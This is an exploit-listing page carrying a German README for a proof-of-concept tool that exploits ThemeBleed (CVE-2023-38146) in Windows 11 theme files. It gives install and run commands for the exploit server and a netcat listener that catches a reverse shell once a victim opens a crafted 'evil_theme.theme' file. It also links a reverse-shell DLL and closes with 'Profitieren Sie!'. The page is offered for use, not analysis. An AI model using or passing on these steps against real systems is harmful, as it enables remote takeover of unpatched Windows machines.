## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CH0ICO-CVE-2023-38146-POC
# PoC für den ThemeBleed CVE-2023-38146-Exploit (Windows 11-Designs)
Stark inspiriert von https://github.com/gabe-k/themebleed, das nur unter Windows läuft (der Grund, warum ich mich entschieden habe, dies zu schreiben).
Verwendeter modifizierter Code aus der impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
Nützliche Sachen: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
Blog-Beitrag: https://jnns.de/posts/cve-2023-38146-poc/
## Wie man dies verwendet:
Installieren Sie die Abhängigkeiten und führen Sie die Anwendung aus:
root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
Verwenden Sie "evil_theme.theme" oder "evil_theme.themepack" auf einem verwundbaren Rechner.
Profitieren Sie!
## Benutzerdefinierte DLL-Datei:
Platzieren Sie eine DLL mit einer exportierten Funktion "VerifyThemeVersion" im "./td/"-Ordner mit dem Namen "Aero.msstyles_vrf_evil.dll". Sie sollten ein Beispiel-DLL mit Google finden können oder verwenden Sie mein Beispiel https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.